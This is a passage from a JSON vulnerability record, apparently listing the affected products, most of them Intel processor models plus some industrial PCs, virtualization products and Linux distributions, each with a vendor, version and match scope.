        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3205rk"
      },
      {
        "model": "fusion",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "8.5.9"
      },
      {
        "model": "vl bpc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700k"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7520"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4000"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10c"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3530"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "960"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2675qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700"
      },
      {
        "model": "xeon e3 1285 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v3"
      },
      {
        "model": "xeon e5 2630l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8850"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4890_v2"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5115"
      },
      {
        "model": "bl bpc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e3 1231 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2467m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450p"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5630"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570s"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3736f"
      },
      {
        "model": "xeon e5 2603",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7600u"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "lc5518"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v3"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7290f"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6006u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350u"
      },
      {
        "model": "xeon e5 2650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120t"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2683_v4"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5650u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5257u"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100u"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7230"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670_v3"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2830"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790k"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660ue"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6585r"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "990x"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770s"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2665"
      },
      {
        "model": "vl2 bpc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750s"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5550u"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6132"
      },
      {
        "model": "vl ppc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e3 1280",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2450l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340te"
      },
      {
        "model": "cortex-x1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4105"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3555le"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v3"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3440"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2840"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126"
      },
      {
        "model": "xeon e3 1125c v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1225 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1275 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330e"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4669_v3"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l3406"
      },
      {
        "model": "xeon e3 1505l v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3950"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430m"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2520"
      },
      {
        "model": "simatic winac rtx \\ 2010",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2010"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3430"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1578l_v5"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570s"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699r_v4"
      },
      {
        "model": "xeon e5 2628l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5603"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4108"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670s"
      },
      {
        "model": "xeon e5 1630 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4116"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3750"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500k"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5530"
      },
      {
        "model": "local service management system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3635qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670t"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3560"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3050"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "720qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100h"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2738"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6442eq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790s"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2377m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "880"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7500u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3510"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310e"
      },
      {
        "model": "vl bpc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3815"
      },
      {
        "model": "xeon e5 2648l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2420"
      },
      {
        "model": "vs360hd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3295rk"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2805"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "470um"
      },
      {
        "model": "xeon e5 1620",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2640 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2410m"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "17.10"
      },
      {
        "model": "xeon e3 1235l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520um"
      },
      {
        "model": "xeon e5 2643 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5670"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v2"
      },
      {
        "model": "bl ppc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3720qm"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7530"
      },
      {
        "model": "xeon e3 1240",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1220 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4400e"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770s"
      },
      {
        "model": "atom x5-e3940",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030u"
      },
      {
        "model": "xeon e5 2648l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340m"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v4"
      },
      {
        "model": "workstation",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "12.0.0"
      },
      {
        "model": "xeon e5 1650 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1235",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2430l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400s"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4880_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5200u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8837"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5557u"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.3"
      },
      {
        "model": "simatic itc2200 pro",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4750hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6098p"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v2"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4624l_v2"
      },
      {
        "model": "btc14",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pepperl fuchs",
        "version": null
      },
      {
        "model": "fusion",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "8.0.0"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3320m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4558u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3427u"
      },
      {
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j2850"
      },
      {
        "model": "xeon e3 1270 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3160"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6260u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5690"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2698_v4"
      },
      {
        "model": "xeon e5 2450",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2438l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4258u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570t"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8850_v2"
      },
      {
        "model": "vl2 ppc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v3"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7230f"
      },
      {
        "model": "xeon e5 2630l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460"
      },
      {
        "model": "xeon e3 1265l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7295"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3460"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7567u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v2"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3480"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3690"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3265rk"
      },
      {
        "model": "xeon e3 1280 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5607"
      },
      {
        "model": "xeon e5 2623 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940xm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v3"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2340ue"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6134m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5010u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300u"
      },
      {
        "model": "xeon e3 1220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126f"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qe"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112"
      },
      {
        "model": "hci",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "vl2 bpc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e3 1265l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2480"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735f"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500s"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667"
      },
      {
        "model": "bl bpc 3001",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699_v3"
      },
      {
        "model": "xeon e3 1240l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2550"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5507"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3740d"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v3"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850hq"
      },
      {
        "model": "xeon e5 2603 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2920xm"
      },
      {
        "model": "xeon e5 2609 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1245 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3830"
      },
      {
        "model": "linux enterprise software development kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735d"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3632qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v3"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7285"
      },
      {
        "model": "simatic itc1500 pro",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "model": "xeon e5 2420 v2",
        "scope": "eq",
